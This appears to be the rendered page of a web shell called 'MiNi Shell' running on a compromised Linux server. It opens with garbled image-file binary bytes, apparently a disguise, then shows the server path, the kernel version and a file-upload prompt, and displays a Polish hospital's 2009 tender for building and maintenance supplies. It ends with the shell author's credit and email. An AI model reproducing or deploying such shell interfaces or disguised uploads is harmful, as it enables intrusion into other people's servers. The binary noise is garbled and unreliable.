JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090130/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090130/12432-N-2009.html

<p class="kh_header"><b>Suwałki: Dostawa materiałów budowlanych, elektrycznych, hydraulicznych, stolarskich i innych na rok 2009.</b><br>
<b>Numer ogłoszenia: 12432 - 2009; data zamieszczenia: 30.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Wojewódzki , ul. Szpitalna 60, 16-400 Suwałki, woj. podlaskie, tel. 087 5629582, 5629462, 5629595, faks 087 5629594.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.suwalki.pl/przetargi</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów budowlanych, elektrycznych, hydraulicznych, stolarskich i innych na rok 2009..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów budowlanych, elektrycznych, hydraulicznych, stolarskich i innych na rok 2009 dla SPSW w Suwałkach w asortymencie i w szacunkowej ilości określonych w załączniku nr 3 do SIWZ w okresie 12 miesięcy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 28.81.10.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W przedmiotowym postępowaniu nie wymaga się wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy:
1)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub pisemnym zobowiązaniem innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na mocy art. 24 ustawy pzp.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu Zamawiający wymaga dołączenia do oferty:
1)oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w ust.1 - treść oświadczenia znajduje się w druku oferty, który stanowi załącznik nr 1 do SIWZ 
2)aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności  gospodarczej , wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
/§ 1 ust. 1 pkt. 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane  (Dz. U. z 24    maja 2006 r. Nr 87, Poz. 605)/  
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 2 pkt. 2 składa: dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości
Dokument(y), o których mowa wyżej powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 3, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub adres zamieszkania.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.suwalki.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych, ul. Szpitalna 60, 16 - 400 Suwałki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2009 godzina 09:30, miejsce: Kancelaria Szpitala, ul. Szpitalna 60, 16 - 400 Suwałki.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet I - Materiały i części zamienne - instalacja elektryczna.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Żarówka 60 W	                       szt.	1400
2	Żarówka świec. 25W	          szt.	   50
3	Świetlówka 36W	                      Szt.	 900
4	Świetlówka 18W	                      Szt.	   60
5	Zapłonnik 4-80W	                      Szt.	 200
6	Zapłonnik 4-22W	                      Szt.	   60
7	Wkładka topikowa 10A	         Szt.	   50
8	Wkładka topikowa 16A	         Szt.	 200
9	Wkładka topikowa 20A	         Szt.	 200
10	Wkładka topikowa 25A	         Szt.	 100
11	Taśma izolacyjna	                      Szt.	   50
12	Przewód YDY 3x1,5	         mb	 300
13	Przewód YDY 3x2,5	         mb	 100
14	Punkt poboru tlenu MC-65	        Szt.	   30
15	Punkt poboru - próżnia	        Szt.	   10
16	Punkt poboru - powietrza	        Szt.	   10
17	Puszka p/t	                     Szt.	   60
18	przycisk ster. PSJ z przewodem     Szt.	   20
19	Wtyczka 16A	                     Szt.	   20
20	Oprawka świetlówki	        Szt.	  200
21	Oprawka OKN 2/36W	        Szt.	   60
22	Lama rtęciowa MIX F-160W	        Szt.	   10
23	Listwa instalacyjna 16x16	        mb	               100
24	Gniazdo podw. Hermet. n/t	        Szt.	    20
25	Gniazdo poj. Herm. n/t	        Szt.	    20.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 28.81.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet II - Materiały i części zamienne - instalacja hydrauliczna.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Bateria umywalki	                          Szt.	      20
2	Bateria łokciowa lekarska	             Szt.	      10
3	Bateria natrysku	                          Szt.	      10
4	Bateria wannowa	                          Szt.	        5
5	Deska sedesowa	                          Szt.	      50
6	Dwuzłączka oc c15	                          Szt.	      20
7	Głowica baterii c15	                          Szt.	     120
8	Kolano oc c15	                          Szt.	      20
9	Kolano nyplowe oc c15	             Szt.	      20
10	Kolano dolnopłuka	                          Szt.	      10
11	Kratka wentylacyjna 14x14	             Szt.	      60
12	Lejek gumowy dolnopłuka	             Szt.	      50
13	Len (konopie)	                          kg	        3
14	Miska ustępowa	                          Szt.	      15
15	Nypel oc c15	                          Szt.	      10
16	Mufka oc c15	                          Szt.	      10
17	Pokrętło baterii	                          Szt.	    120
18	Rura PCV c50x250	                          Szt.	      10
19	Rura PCV c50x1000	             Szt.	      10
20	Rura PCV c50x500	                          Szt.	      10
21	Rura PCV c50x2000	             Szt.	        5
22	Rura oc c15	                           mb	      30
23	Syfon umywalkowy	                           Szt.	      40
24	Syfon wannowy	                           Szt.	        5
25	Syfon zlewom. pojed.	              Szt.	        5
26	Śruby do mocowania umywalki	  Szt.	      30
27	Śruby do mocowania sedesów	  Szt.	      15
28	Umywalka 60	                            Szt.	      15
29	Śrubunek kątowy c15	               Szt.	      10
30	Śrubunek kątowy c20	                Szt.	      10
31	Trójnik oc c15	                             Szt.	      20
32	Trójnik oc red. c20x15	                Szt.	      10
33	Uszczelka krzywki	                             Szt.	     200
34	Uszczelka głowicy	                             Szt.	     200
35	Uszczelka grzybka	                             Szt.	     200
36	Wężyk w oplocie 30	                Szt.	      20
37	Wężyk w oplocie 40	                Szt.	      20
38	Wężyk natrysku 150	                Szt.	      30
39	Zawór kulowy c15	                             Szt.	      20
40	Zawór dolnopłuka	                             Szt.	      30
41	Zawór pływakowy dolnopłuka	   Szt.	      30
42	Silikon sanitarny	                             Szt.	      30.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 28.81.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet III - Materiały budowlane.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Cement (25kg)	                          Szt.	50
2	Zaprawa typu Goldband (30kg)	Szt.	10
3	Gładź typu Gipsar (25kg)	             Szt.	50
4	Emulsja biała (10L)	                          Szt.	80
5	Emalia biała (1L)	                          Szt.	150
6	Emalia kremowa (1L)	             Szt.	50
7	Emalia biała NITRO (1L)	             Szt.	10
8	Emalia j.szara (1L)	                          Szt.	80
9	Folia malarska gruba	             Szt.	10
10	Pigment typu COLOREX	             Szt.	50
11	Klej typu Latex (3 kg)	             Szt.	20
12	Klej do glazury (25kg)	             Szt.	60
13	Płytki podłogowe pcv	             M2	120
14	Listwa do glazury 2,5 m	             Szt.	30
15	Pędzel ławkowiec	                          Szt.	4
16	Pędzel okrągły	                          Szt.	20
17	Wapno hydratyzowane (30kg)	Szt.	10
18	Wałek malarski 18 cm.	             Szt.	20
19	Rozpuszczalnik  (0,5L)	             Szt.	30
20	Podkład j. szary (1L)	             Szt.	120
21	Szpachelka metalowa	             Szt.	6
22	Klej polimerowy (0,5L)	             Szt.	30
23	Glazura	                                       M2	80
24	Gąbka do szlifowania	             Szt.	10
25	Papier ścierny	                          Szt.	50
26	Środek grzybobójczy	             Szt.	5.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 28.81.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet IV - Materiały stolarskie i inne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Klej do drewna	                     Szt.	5
2	Miara zwijana 3m, 5m, 8m	        Szt.	6
3	Wkręt do drewna	                     Szt.	400
4	Kołek rozporowy c6	        Szt.	300
5	Kołek rozporowy c8	        Szt.	300
6	Kołek rozporowy c10	        Szt.	300
7	Kołek rozporowy c12	        Szt.	200
8	Kołek do regipsu c10	        Szt.	200
9	Obrzeże z klejem	                      mb	200
10	Tarcza do metalu 125*1	         Szt.	60
11	Tarcza diamentowa	         Szt.	2
12	Tarcza do szlifowania 125*6	         Szt.	60
13	Tarcza do metalu 400*4	         szt.	5
14	Paski klinowe	                     Szt.	30
15	Brzeszczot	                     Szt.	50
16	Łożyska	                                  Szt.	20
17	Prowadnica rolkowa 30,40 cm        Szt.	10
18	Papier ścierny na płótnie	        Szt.	50
19	Pas do szlifierki 100*610	        Szt.	10
20	Gwoździe stalowe 4/2,5	          kg	1
21	Taśma teflonowa	                     Szt.	6
22	Wkładka bębenkowa	        Szt.	30
23	Zamek drzwiowy 90/50	        szt.	5
24	Zamek drzwiowy 72/60	        Szt.	15
25	Zamek drzwiowy 50/60	        Szt.	5
26	Zamek meblowy patentowy	        Szt.	30
27	Zamek typu Łucznik 60	        Szt.	5
28	Zszywki 8mm, 10mm	         Op.	2
29	Szczypce uniwersalne	         Szt.	10
30	Wiertło SDS c6,8,10,12,14	         Szt.	20
31	Rękawice robocze	                    pary	200
32	Elektroda c2,5	                     Szt.	400
33	Elektroda c3,2	                     Szt.	200
34	Filc do magla	                      mb	30
35	Wkrętarki ślusarskie	        Szt.	10
36	Rączka do silikonu	                     Szt.	2
37	Piła do drewna - pilarka	        Szt.	1
38	Nóż do szkła	                     Szt.	2
39	Nitownica	                     Szt.	1
40	Torba narzędziowa	                     Szt.	14.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 28.81.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com